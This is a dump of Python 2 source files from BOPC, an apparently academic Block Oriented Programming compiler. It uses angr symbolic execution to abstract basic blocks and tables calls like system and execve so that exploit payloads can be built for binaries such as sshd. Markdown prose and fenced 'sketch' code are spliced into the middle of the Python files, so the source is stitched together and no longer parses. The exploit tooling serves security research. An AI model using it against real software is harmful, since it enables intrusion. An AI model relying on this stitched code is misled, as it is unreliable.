                # size might be followed by the "{UNINITIALIZED}" keyword, so it must be
                # dropped; if not, the ">" must also be dropped
                size = size.replace("{UNINITIALIZED}>", "").replace(">", "")

                # add the symbolic variable to the map
                self.symvars[ leaf ] = (int(addr, 16), int(size, 10) >> 3)

    # ---------------------------------------------------------------------------------------------
    # __memread_callback(): This function is invoked every time that a memory read operation is
    #       performed.
    #
    #   :Arg state: Current state to read memory from
    #   :Ret: None.
    #
    def __memread_callback( self, state ):
        if self.__callback_mutex == 1:              # if mutex is taken, return
            return

        self.__callback_mutex = 1                   # get lock

        # ---------------------------------------------------------------------
        # If address is part of the .bss/.data, it will be initialized with a
        # default value of 0. However, it can get any value (due to AWP) so it
        # should get a symbolic value.
        # ---------------------------------------------------------------------
        # get ELF sections that give default values to their uninitialized variables
        bss  = self.__proj.loader.main_object.sections_map[".bss"]
        data = self.__proj.loader.main_object.sections_map[".data"]
        addr = state.se.eval(state.inspect.mem_read_address)

        # print '=== READ', hex(state.inspect.instruction), hex(addr)

        # check if address is inside .bss or .data sections
        if bss.min_addr  <= addr and addr <= bss.max_addr or \
           data.min_addr <= addr and addr <= data.max_addr:
                # This also works, but is for Big Endian:
                #   state.memory.make_symbolic('mem', state.inspect.mem_read_address, length)

                # make address symbolic
                symv = state.se.BVS("mem_%x" % addr, state.inspect.mem_read_length << 3)

                state.memory.store(state.inspect.mem_read_address, symv,
                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)

                # we should read it to update state.inspect.mem_read_expr
                state.memory.load(state.inspect.mem_read_address,
                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)

        # -------------------------------------------------------------------------------
        # Identifying dereferences is a two stage process. Here (1st step) we capture all
        # memory load information (which happens before the register write) at this
        # instruction (x64 has 1 distinct memory read per instruction; instructions like
        # popad do multiple register writes, but this is not an issue here).
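The `mem_ADDRESS_RANDOM_SIZE` parsing that `__add_sym_vars()` performs on a leaf's string form can be sketched in isolation. The sample leaf string in the usage note is illustrative of claripy's rendering; real leaves may carry a trailing `{UNINITIALIZED}>`:

```python
# Hedged, self-contained sketch of the memory-variable parsing described above.
# Returns (address, size-in-bytes) or None when the leaf is not a memory variable.
import re

def parse_mem_var(leafstr):
    """Extract (address, size) from a mem_ADDRESS_RANDOM_SIZE leaf string."""
    m = re.search(r'mem_([0-9a-f]+)_([0-9]+)_([0-9]+)', leafstr)
    if m is None:
        return None
    addr = int(m.group(1), 16)          # ADDRESS field is hexadecimal
    size = int(m.group(3), 10) >> 3     # SIZE field is in bits; convert to bytes
    return (addr, size)
```

For example, a leaf printed as `<BV64 mem_7fffffffffef1e8_82_64{UNINITIALIZED}>` parses to the address `0x7fffffffffef1e8` and an 8-byte access.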
        # -------------------------------------------------------------------------------
        self.__load[ state.inspect.instruction ] = (
            state.inspect.mem_read_address,
            state.inspect.mem_read_length,
            state.inspect.mem_read_expr             # this will be updated
        )

        # associate memory expression with memory address (needed for later on)
        self.__mem2addr[ state.inspect.mem_read_expr.shallow_repr() ] = \
                (state.inspect.mem_read_address, state.inspect.mem_read_length)

        # extract memory symbolic variables
        self.__add_sym_vars( state.inspect.mem_read_address )

        self.__callback_mutex = 0                   # release lock

    # ---------------------------------------------------------------------------------------------
    # __regwrite_callback(): This function is invoked every time that a register write operation
    #       is performed.
    #
    #   :Arg state: Current state to write register to
    #   :Ret: None.
    #
    def __regwrite_callback( self, state ):
        if self.__callback_mutex == 1:              # if mutex is taken, return
            return

        self.__callback_mutex = 1                   # get lock

        try:
            # get register that is being written
            reg = self.__proj.arch.register_names[state.inspect.reg_write_offset]
        except KeyError:                            # just in case
            return

        # TODO: Regwrite only checks writes, but it doesn't check if the previous value
        # persists after:
        #       .text:000000000040BCEA      mov     eax, [rbp+ac]
        #       .text:000000000040BCF0      cdqe
        #       .text:000000000040BCF2      shl     rax, 3
        #       .text:000000000040BCF6      mov     rcx, rax
        #       .text:000000000040BCF9      add     rcx, [rbp+nargv]
        #
        # ('sudo' example)
        #
        # We should add some checks to test whether the regwrite is a "mov" or something else

        # print '--------------- ', hex(state.addr), hex(state.inspect.instruction), reg,
        #       state.inspect.reg_write_expr

        # remember the "raw" value that is being written to the register
        self.__reg_rawval[ reg ] = state.inspect.reg_write_expr

        if reg not in HARDWARE_REGISTERS:           # we only care about specific registers
            self.__callback_mutex = 0               # release lock
            return

        # -------------------------------------------------------------------------------
        # This is the 2nd step of the dereference identification process. At this point
        # we match the instruction that writes a register with the instruction that reads
        # from memory. This is because we want to match the memory read expression with
        # the register write.
        # -------------------------------------------------------------------------------
        elif state.inspect.instruction in self.__load:
            addr, length, _ = self.__load[ state.inspect.instruction ]

            # ok we have a dereference!
            deps   = [ ]                            # dependent registers
            symtab = { }

            # find register dependencies on the address (e.g., rsi)
            for sym, nam in self.__symreg.iteritems():
                # skip registers that are not symbolic (e.g., rbp)
                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():
                    deps.append(nam)
                    symtab[nam] = sym

            # there might be dependencies with constant memory addresses as well (i.e., reading
            # from global variables). Such dependencies are handled during trace searching, so
            # we ignore them for now. However the register dependencies are needed to check
            # whether a register mapping is valid or not.

            # if "deps" has a single element, we know that a register is contained in the
            # "addr" expression. If that expression also has a single node, we know that it
            # will be that register.
            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:
                memrd = length
            else:
                memrd = None

            # (if basic block has >1 dereferences on the same register, use the most recent one)
            self.regwr[ reg ] = {                   # set data
                'type'  : 'deref',
                'addr'  : addr,
                'deps'  : deps,
                'sym'   : symtab,
                'memrd' : memrd
            }

        # -------------------------------------------------------------------------------
        # The current approach for detecting dereferences is not transitive. Consider the
        # following example:
        #       mov rcx, [rsi + 0x10]
        #       mov rdi, rcx
        #
        # In the 2nd register write, rdi gets an unconstrained symbolic variable and is
        # therefore of type 'clob'. However, we want rdi to be treated in the same way as
        # rcx, as they both have the exact same value. Because the SE engine assigns a
        # unique symbolic variable to every memory cell, we can associate these variables
        # with their addresses. Thus, when a register gets a random symbolic value, we can
        # figure out whether it is actually a dereference.
        # -------------------------------------------------------------------------------
        elif state.inspect.reg_write_expr.shallow_repr() in self.__mem2addr:
            addr, length = self.__mem2addr[ state.inspect.reg_write_expr.shallow_repr() ]

            # this code is copy-pasted from above
            deps   = [ ]
            symtab = { }

            for sym, nam in self.__symreg.iteritems():
                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():
                    deps.append(nam)
                    symtab[nam] = sym

            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:
                memrd = length
            else:
                memrd = None

            self.regwr[ reg ] = {
                'type'  : 'deref',
                'addr'  : addr,
                'deps'  : deps,
                'sym'   : symtab,
                'memrd' : memrd
            }
        # -------------------------------------------------------------------------------

        self.__callback_mutex = 0                   # release lock

    # ---------------------------------------------------------------------------------------------
    # __sig_handler(): Symbolic execution may take forever to complete. To deal with it, we set
    #       an alarm. When the alarm is triggered, this signal handler is invoked and throws an
    #       exception that causes the symbolic execution to halt.
    #
    #   :Arg signum: Signal number
    #   :Arg frame:  Current stack frame
    #   :Ret: None.
# def __sig_handler( self, signum, frame ): if signum == signal.SIGALRM: # we only care about SIGALRM # angr may ignore the exception, so let's throw many of them :P raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT) raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT) raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT) raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT) # --------------------------------------------------------------------------------------------- ''' ======================================================================================= ''' ''' CLASS INTERFACE ''' ''' ======================================================================================= ''' # --------------------------------------------------------------------------------------------- # __init__(): Class constructor. This function initializes the environment for the symbolic # execution, it executes the basic block, and performs the abstraction. # # :Arg project: Instance of angr project # :Arg addr: Entry point of the basic block # :Ret: None. 
    #
    def __init__( self, project, addr ):
        self.__proj  = project                      # we'll need these
        self.__entry = addr

        # ---------------------------------------------------------------------
        # initialize abstraction variables
        # ---------------------------------------------------------------------
        self.regwr    = { }                         # all register writes for that block
        self.memrd    = set()                       # all memory reads for that block
        self.memwr    = set()                       # all memory writes for that block
        self.conwr    = set()                       # all concrete memory writes for that block
        self.splmemwr = [ ]                         # all SPL memory writes for that block
        self.call     = { }                         # function/system call (if any) for that block
        self.cond     = { }                         # conditional jumps (if any) for that block
        self.symvars  = { }                         # symbolic variables for memory

        self.__load       = { }                     # memory loads (for internal use)
        self.__mem2addr   = { }                     # map between memory expressions and addresses
        self.__mem        = { }
        self.__reg_rawval = { }

        # ---------------------------------------------------------------------
        # Create a blank state and prepare it for symbolic execution.
        #
        # TODO: Check options again
        # ---------------------------------------------------------------------
        inist = self.__proj.factory.blank_state(    # create a blank state
                    addr=addr,                      # set address
                    #mode='symbolic',
                    add_options={                   # configure options
                        simuvex.o.AVOID_MULTIVALUED_READS,
                        simuvex.o.AVOID_MULTIVALUED_WRITES,
                        simuvex.o.NO_SYMBOLIC_JUMP_RESOLUTION,
                        simuvex.o.CGC_NO_SYMBOLIC_RECEIVE_LENGTH,
                        simuvex.o.NO_SYMBOLIC_SYSCALL_RESOLUTION,
                        simuvex.o.TRACK_ACTION_HISTORY,

                        # newly added option
                        simuvex.o.SYMBOLIC_INITIAL_VALUES
                    },
                    remove_options=simuvex.o.resilience_options | simuvex.o.simplification
        )

        # configure more options (add/remove)
        inist.options.discard(simuvex.o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY)

        inist.options.update( {
            simuvex.o.TRACK_REGISTER_ACTIONS,
            simuvex.o.TRACK_MEMORY_ACTIONS,
            simuvex.o.TRACK_JMP_ACTIONS,
            simuvex.o.TRACK_CONSTRAINT_ACTIONS
        } )

        # ---------------------------------------------------------------------
        # initialize all registers with a symbolic variable
        # ---------------------------------------------------------------------
        inist.regs.rax = inist.se.BVS("rax", 64)    # give convenient names
        inist.regs.rbx = inist.se.BVS("rbx", 64)
        inist.regs.rcx = inist.se.BVS("rcx", 64)
        inist.regs.rdx = inist.se.BVS("rdx", 64)
        inist.regs.rsi = inist.se.BVS("rsi", 64)
        inist.regs.rdi = inist.se.BVS("rdi", 64)

        # rbp may also be needed, as it's mostly used to access local variables (e.g.,
        # rax = [rbp-0x40]), but some binaries don't use rbp and all references are
        # rsp-relative. In these cases it may be worth using rbp as well.
        if MAKE_RBP_SYMBOLIC:
            inist.regs.rbp = inist.se.BVS("rbp", 64)    # keep rbp symbolic
        else:
            inist.registers.store('rbp', FRAMEPTR_BASE_ADDR, size=8,
                                  endness=archinfo.Endness.LE)

        # rsp must be concrete and properly initialized
        inist.registers.store('rsp', RSP_BASE_ADDR, size=8, endness=archinfo.Endness.LE)

        inist.regs.r8  = inist.se.BVS("r08", 64)
        inist.regs.r9  = inist.se.BVS("r09", 64)
        inist.regs.r10 = inist.se.BVS("r10", 64)
        inist.regs.r11 = inist.se.BVS("r11", 64)
        inist.regs.r12 = inist.se.BVS("r12", 64)
        inist.regs.r13 = inist.se.BVS("r13", 64)
        inist.regs.r14 = inist.se.BVS("r14", 64)
        inist.regs.r15 = inist.se.BVS("r15", 64)

        # ---------------------------------------------------------------------
        # Other initializations
        # ---------------------------------------------------------------------
        # map symbolic names to registers
        # self.__symreg = { self.__getreg(inist, r):r for r in HARDWARE_REGISTERS }
        self.__symreg = {
            inist.regs.rax : 'rax',
            inist.regs.rbx : 'rbx',
            inist.regs.rcx : 'rcx',
            inist.regs.rdx : 'rdx',
            inist.regs.rsi : 'rsi',
            inist.regs.rdi : 'rdi',
            inist.regs.rbp : 'rbp',
            inist.regs.rsp : 'rsp',
            inist.regs.r8  : 'r8',
            inist.regs.r9  : 'r9',
            inist.regs.r10 : 'r10',
            inist.regs.r11 : 'r11',
            inist.regs.r12 : 'r12',
            inist.regs.r13 : 'r13',
            inist.regs.r14 : 'r14',
            inist.regs.r15 : 'r15'
        }

        # UPDATE: Don't create a symbolic stack, as this consumes all the Virtual Memory and
        # may crash the machine. By carefully configuring rsp and rbp within the limits of a
        # virtual page, we can achieve the same effect, so we don't need a symbolic stack.
        #
        # The main issue here is the permissions (stack may not appear as R+W), but as long
        # as both rsp and rbp point into the same page, there is no problem.
        #
        # # create a symbolic stack (required to have writable pages)
        # stack = inist.se.BVS("stack", self.__proj.arch.bits * _STACK_SZ)
        #
        # # write symbolic stack to memory
        # # inist.memory.store(inist.regs.sp, stack, endness=archinfo.Endness.LE)
        # inist.memory.store(STACK_BASE_ADDR, stack, endness=archinfo.Endness.LE)

        # when solver gives up (in milliseconds)
        inist.se._solver.timeout = ABSBLK_TIMEOUT*1000

        # ---------------------------------------------------------------------
        # Hooks for identifying dereferences
        # ---------------------------------------------------------------------
        self.__callback_mutex = 0                   # hooks are enabled

        inist.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__regwrite_callback)
        inist.inspect.b('mem_read',  when=angr.BP_AFTER,  action=self.__memread_callback)

        # -------------------------------------------------------------------------
        # Do the symbolic execution (using simulation managers)
        # -------------------------------------------------------------------------
        simgr = self.__proj.factory.simulation_manager(thing=inist)
        simgr.save_unconstrained = True             # do not discard unconstrained stashes

        signal.signal(signal.SIGALRM, self.__sig_handler)
        signal.alarm(ABSBLK_TIMEOUT)

        # make sure that you execute the normalized block
        # TODO: cleanup
        node = ADDR2NODE[self.__entry]
        num_inst = len(node.instruction_addrs) if node is not None else None

        if num_inst:
            simgr.step(num_inst=num_inst)
        else:
            simgr.step()                            # execute 1 basic block

        signal.alarm(0)                             # disable alarm

        if simgr.active:                            # check if execution was successful
            newst = simgr.active[0]                 # get the new state (after execution)

        elif simgr.unconstrained:
            # because we execute a single basic block, it's possible to end up in a state
            # whose instruction pointer depends on symbolic data, and hence not know how to
            # proceed (i.e., unconstrained stash)
            newst = simgr.unconstrained[0]

        elif simgr.deadended:                       # check if execution can't continue (retq)
            newst = simgr.deadended[0]              # work with what you have

        else:                                       # everything else should generate an error
            print simgr.stashes
            raise Exception('There are no usable stashes!')

        # -------------------------------------------------------------------------
        # Analyze results and generate the abstractions
        # -------------------------------------------------------------------------
        self.__reg_w(newst)                         # analyze register writes
        self.__mem_r(newst)                         # analyze memory reads
        self.__mem_w(newst)                         # analyze memory writes
        self.__call(newst)                          # analyze function/system calls
        self.__cond(newst)                          # analyze conditional jumps

        # -------------------------------------------------------------------------
        # Apply (any) patches
        #
        # Instructions like 'rep movsq' incorrectly classify rsi and rdi as 'deref'
        # types. This is because angr assigns a basic block with a single rep*
        # instruction (as VEX IR contains loops). To fix that, we simply mark the
        # used registers as clobbering.
        # -------------------------------------------------------------------------
        blk_insns = node.block.capstone.insns       # get block instructions

        if len(blk_insns) == 1 and 'rep' in blk_insns[0].insn.mnemonic:
            # name = blk_insns[0].insn.insn_name()  # get instruction name (w/o the rep*)

            # make 'rsi', 'rdi' and 'rcx' clobbering (all of them are modified)
            self.regwr['rdi'] = {'type' : 'clob'}
            self.regwr['rsi'] = {'type' : 'clob'}
            self.regwr['rcx'] = {'type' : 'clob'}

        '''
        print
        print '-------------------- Register Writes --------------------'
        for a, b in self.regwr.iteritems(): print a, b
        print '-------------------- Memory Reads --------------------'
        for a, b in self.memrd: print a, b
        print '-------------------- Memory Writes --------------------'
        for a, b in self.memwr: print a, b
        print '-------------------- Concrete Writes --------------------'
        for a, b in self.conwr: print a, b
        print '-------------------- SPL Memory Writes --------------------'
        for a in self.splmemwr: print a
        print '-------------------- Calls --------------------'
        print self.call
        print '-------------------- Conditional Jumps --------------------'
        print self.cond
        '''

    # ---------------------------------------------------------------------------------------------
    # __getitem__(): An alternative way to get block "abstractions".
    #
    #   :Arg what: The name of the abstraction that you want to get
    #   :Ret: The requested abstraction.
    #
    def __getitem__( self, what ):
        try:
            return {
                'regwr'    : self.regwr,
                'memrd'    : self.memrd,
                'memwr'    : self.memwr,
                'conwr'    : self.conwr,
                'splmemwr' : self.splmemwr,
                'call'     : self.call,
                'cond'     : self.cond,
                'symvars'  : self.symvars
            }[ what ]
        except KeyError:
            return None                             # abstraction not found

    # ---------------------------------------------------------------------------------------------
    # __iter__(): Iterate over all abstractions. This function is a generator over all possible
    #       abstractions.
    #
    #   :Ret: Each time the function returns a different tuple (name, abstraction).
    #
    def __iter__( self ):
        yield 'regwr',    self.regwr
        yield 'memrd',    self.memrd
        yield 'memwr',    self.memwr
        yield 'conwr',    self.conwr
        yield 'splmemwr', self.splmemwr
        yield 'call',     self.call
        yield 'cond',     self.cond
        yield 'symvars',  self.symvars

# -------------------------------------------------------------------------------------------------
'''
if __name__ == '__main__':                          # DEBUG ONLY
    import angr

    project = angr.Project('eval/opensshd/sshd', load_options={'auto_load_libs': False})
    # project.analyses.CFGFast()                    # to prepare project.kb.functions

    # Problem: Indirect pointers in .bss:
    #   .text:00000000004050B1      mov     rax, cs:public_key
    #   .text:00000000004050B8      mov     rdi, [rax+20h]  ; value
    #
    # abstr = abstract_ng(project, 0x4050B1)

    # abstr = abstract_ng(project, 0x416610)
    abstr = abstract_ng(project, 0x416631)

    # TODO: check me again!
    abstr = abstract_ng(project, 0x40c01f)

    for a, b in abstr:
        print '\t', a, b

    print 'done!'
''' # ------------------------------------------------------------------------------------------------- ================================================ FILE: source/calls.py ================================================ #!/usr/bin/env python2 # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- # # # calls.py # # This module contains all declarations for system and library calls that SPL supports. A call is # declared as a tuple (name, nargs, modregs): # # name : The library/system call name # nargs : The number of its arguments. Set to INFINITY for variadic functions. # modregs : A list of all registers that are modified when the call returns. Note that rax # is always modified as it has the return value. # # To keep the implementation simple, We do not support library calls that take arguments on the # stack. # # Also, it is possible to declare any custom calls that reside in the binary. 
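The `(name, nargs, modregs)` tuple format documented above can be exercised with a small, dependency-free sketch. The table and the `lookup()` helper below are illustrative, not part of the shipped module; `INFINITY` stands in for the constant imported from `coreutils`:

```python
# Hedged sketch of how a call declaration tuple is consumed.
INFINITY = float('inf')                 # stand-in for coreutils' INFINITY

my_calls = [
    # ssize_t read(int fd, void *buf, size_t count)
    ('read',   3,        ['rax', 'rcx', 'r10', 'r11']),
    # int printf(const char *format, ...)          (variadic)
    ('printf', INFINITY, ['rax', 'rcx', 'rdx', 'rsi', 'rdi', 'r8', 'r10', 'r11']),
]

def lookup(table, name):
    """Return the first matching (name, nargs, modregs) entry, or None."""
    matches = [c for c in table if c[0] == name]
    return matches[0] if matches else None
```

Appending a custom call that resides in the binary is then just a matter of adding another tuple to the table.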
# -------------------------------------------------------------------------------------------------
from coreutils import *

# -------------------------------------------------------------------------------------------------
# Calling Conventions
# -------------------------------------------------------------------------------------------------
SYSCALL_CC = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']   # syscalls use r10 (rcx is clobbered)
LIBCALL_CC = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']   # System V AMD64 ABI

# -------------------------------------------------------------------------------------------------
# Supported system calls
# -------------------------------------------------------------------------------------------------
syscalls__ = [
    # ssize_t read(int fd, void *buf, size_t count)
    ('read', 3, ['rax', 'rcx', 'r10', 'r11']),

    # ssize_t write(int fd, const void *buf, size_t count)
    ('write', 3, ['rax', 'rcx', 'r10', 'r11']),

    # void *sbrk(intptr_t increment)
    ('sbrk', 1, ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int brk(void *addr)
    ('brk', 1, ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int dup(int oldfd)
    ('dup', 1, ['rax', 'rcx', 'r11']),

    # int dup2(int oldfd, int newfd)
    ('dup2', 2, ['rax', 'rcx', 'r10', 'r11']),

    # unsigned int alarm(unsigned int seconds)
    ('alarm', 1, ['rax', 'rcx', 'r10', 'r11']),

    '''
        Feel free to append more syscalls...
''' ] # ------------------------------------------------------------------------------------------------- # Supported library calls # ------------------------------------------------------------------------------------------------- libcalls__ = [ # int system(const char *command) ('system', 1, ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']), # int puts(const char *s) ('puts', 1, ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']), # int execve(const char *filename, char *const argv[], char *const envp[]) ('execve', 3, ['rax', 'rcx', 'rdx', 'r10', 'r11']), # int execv(const char *filename, char *const argv[]) ('execv', 2, ['rax', 'rcx', 'rdx', 'r10', 'r11']), # int execl(const char *path, const char *arg, ...); ('execl', 2, ['rax', 'rcx', 'rdx', 'r10', 'r11']), # int printf(const char *format, ...) ('printf', INFINITY, ['rax', 'rcx', 'rdx', 'rsi', 'rdi', 'r8', 'r10', 'r11']), # ssize_t send(int sockfd, const void *buf, size_t len, int flags); # (we can ignore the 4th parameter for now) ('send', 3, []), # void exit(int status) ('exit', 1, []), ''' Feel free to append more libcalls... ''' ] # ------------------------------------------------------------------------------------------------- # In case that you don't want to distinguish them # ------------------------------------------------------------------------------------------------- calls__ = syscalls__ + libcalls__ # ------------------------------------------------------------------------------------------------- # Groups of function calls that have similar effects # ------------------------------------------------------------------------------------------------- call_groups__ = [ ['puts', 'printf'], ['execve', 'execv', 'execl' ], ] # ------------------------------------------------------------------------------------------------- # find_syscall(): Search for a specific system call. 
# # :Arg name: Name of the syscall # :Ret: If system call exists, function returns the associated entry in syscalls__. Otherwise None # is returned. # def find_syscall( name ): call = filter(lambda call: call[0] == name, syscalls__) if len(call) == 0: return None elif len(call) == 1: return call[0] else: raise Exception("System call '%s' has >1 entries in syscalls__ table." % name) # ------------------------------------------------------------------------------------------------- # find_libcall(): Search for a specific library call. # # :Arg name: Name of the library call # :Ret: If library call exists, function returns the associated entry in libcalls__. Otherwise None # is returned. # def find_libcall( name ): call = filter(lambda call: call[0] == name, libcalls__) if len(call) == 0: return None elif len(call) == 1: return call[0] else: raise Exception("Library call '%s' has >1 entries in libcalls__ table." % name) # ------------------------------------------------------------------------------------------------- # find_call(): Search for a specific call (either library or system) # # :Arg name: Name of the call # :Ret: If call exists, function returns the associated entry in calls__. Otherwise None is # returned. 
# def find_call( name ): sys = find_syscall(name) lib = find_libcall(name) return sys if sys else lib # logic OR # ------------------------------------------------------------------------------------------------- ================================================ FILE: source/capability.py ================================================ #!/usr/bin/env python2 # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- # # # capability.py # # This module measures the capability of the program. That is, program's capability gives a good # indication, on "what the program is capable of executing" in terms of SPL payloads. However, all # these metrics, aim to identify *upper bounds*; that is, they overestimate the set of SPL programs # that can be truly executed on this binary. 
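The per-type statement counting that this module performs can be sketched without networkx. Real BOPC stores each statement as an attributed node in a `nx.DiGraph`; the list-of-dicts below is a hypothetical stand-in chosen to keep the sketch dependency-free:

```python
# Hedged sketch of the "interesting statements" tally that capability.build()
# reports. Each dict mimics the node attributes that __add() attaches.
def tally(statements):
    """Count capability statements by their 'type' field."""
    ctr = {'regset': 0, 'regmod': 0, 'memrd': 0, 'memwr': 0, 'call': 0, 'cond': 0}
    for stmt in statements:
        ctr[stmt['type']] += 1
    return ctr

sample = [                              # illustrative addresses/values only
    {'addr': 0x400100, 'type': 'regset', 'reg': 'rdi', 'val': 0},
    {'addr': 0x400120, 'type': 'regmod', 'reg': 'rax', 'op': '+', 'val': 1},
    {'addr': 0x400140, 'type': 'call',   'name': 'execve', 'mode': 'libcall'},
    {'addr': 0x400160, 'type': 'regset', 'reg': 'rsi', 'val': 8},
]
```

Because these counts only say that a statement *exists* somewhere in the CFG, they are upper bounds on what the binary can actually execute, as noted above.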
# ------------------------------------------------------------------------------------------------- from coreutils import * from calls import * import path as P import networkx as nx import textwrap import datetime import cPickle as pickle import math import numpy # ----------------------------------------------------------------------------- # Capability Options # ----------------------------------------------------------------------------- CAP_ALL = 0x00FF # all types of statements CAP_REGSET = 0x0001 # register assignments CAP_REGMOD = 0x0002 # register modifications CAP_MEMRD = 0x0004 # memory reads CAP_MEMWR = 0x0008 # memory writes CAP_CALL = 0x0010 # system and library calls CAP_COND = 0x0020 # conditional statements CAP_LOAD = 0x0100 # load the capability graph from a file CAP_SAVE = 0x0200 # save the capability graph to a file CAP_NO_EDGE = 0x0400 # don't calculate edges in capability graph # types of analyses CAP_STMT_COMB_CTR = 'STMT_COMB_CTR' # Count combinations of statements CAP_STMT_MIN_DIST = 'STMT_MIN_DIST' # Count min distance between statements CAP_LOOPS = 'LOOPS' # Analyze loops # ------------------------------------------------------------------------------------------------- # capability: This class is responsible for performing several measurements in the target binary. # class capability( object ): ''' ======================================================================================= ''' ''' INTERNAL VARIABLES ''' ''' ======================================================================================= ''' __cap = nx.DiGraph() # the capability graph (CAP) __uid = 0 # a unique ID ''' ======================================================================================= ''' ''' INTERNAL FUNCTIONS ''' ''' ======================================================================================= ''' # --------------------------------------------------------------------------------------------- # __add(): Add a node to the capability graph. 
    #
    #   :Arg addr: Address of the basic block that contains the statement
    #   :Arg ty:   Statement type: regset / regmod / call / cond
    #   :Arg reg:  Register name (for regset/regmod/cond)
    #   :Arg val:  Statement's value (for regset/regmod/cond)
    #   :Arg mode: Statement mode (const/deref for regset and syscall/libcall for call)
    #   :Arg isW:  A flag indicating whether "val" points to a writable address (for regset)
    #   :Arg op:   Statement operator (for regmod/cond)
    #   :Arg mem:  Memory address (for memrd/memwr)
    #   :Arg name: Function name (for call)
    #   :Ret: None.
    #
    def __add( self, addr, ty, reg=None, val=None, mode=None, isW=None, op=None, name=None,
               mem=None, size=None ):
        # NOTE: We assume that arguments are not malformed, so we don't do any checks
        cap = {
            'regset' : {'addr':int(addr), 'type':ty, 'reg':reg, 'val':val, '+W':isW, 'mode':mode},
            'regmod' : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val},
            'memrd'  : {'addr':int(addr), 'type':ty, 'reg':reg, 'mem':mem, 'size':size},
            'memwr'  : {'addr':int(addr), 'type':ty, 'mem':mem, 'val':val, 'size':size},
            'call'   : {'addr':int(addr), 'type':ty, 'name':name, 'mode':mode},
            'cond'   : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val}
        }[ ty ]                                     # nicely "switch" the appropriate statement

        self.__cap.add_node(self.__uid, **cap)      # add statement to the graph
        self.__uid += 1                             # update UID counter

    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. Simply initialize private variables.
    #
    #   :Arg cfg: Program's CFG.
    #   :Arg name: Program's filename
    #
    def __init__( self, cfg, name ):
        self.__cfg  = cfg                           # save cfg to internal variables
        self.__name = name                          # program's filename

    # ---------------------------------------------------------------------------------------------
    # build(): Build the Capability Graph. This is a very slow process, so it's possible to save
    #       the graph once it's generated, without having to re-calculate it the next time.
    #
    #   :Arg options: An integer that describes how the capability graph should be built. It can
    #       be the logical OR of one or more of the following:
    #
    #           CAP_ALL    | Include all types of statements in the graph
    #           CAP_REGSET | Include register assignments in the graph
    #           CAP_REGMOD | Include register modifications in the graph
    #           CAP_CALL   | Include system and library calls in the graph
    #           CAP_COND   | Include conditional statements in the graph
    #           CAP_LOAD   | Load the capability graph from a file
    #           CAP_SAVE   | Save the capability graph to a file
    #
    #   :Ret: None.
    #
    def build( self, options=CAP_ALL ):
        dbg_prnt(DBG_LVL_1, "Exploring program's capability...")

        # ---------------------------------------------------------------------
        # Load Capability Graph from file?
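The CAP_LOAD path below deserializes the graph with `nx.read_gpickle` and falls back to rebuilding on failure. The caching pattern itself can be sketched with the stdlib alone; a plain dict stands in for the networkx graph, and the function name is hypothetical:

```python
# Hedged sketch of the load-or-rebuild caching behind CAP_LOAD/CAP_SAVE,
# using stdlib pickle in place of networkx's gpickle helpers.
import os
import pickle

def load_or_build(cache_path, build_fn):
    """Return the cached object if present; otherwise build and cache it."""
    if os.path.exists(cache_path):
        with open(cache_path, 'rb') as f:
            return pickle.load(f)       # fast path: reuse previous result
    obj = build_fn()                    # slow path: recompute from scratch
    with open(cache_path, 'wb') as f:
        pickle.dump(obj, f)
    return obj
```

On the second invocation with the same path, the expensive `build_fn` is never called, which mirrors why BOPC persists the graph to `<name>.cap`.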
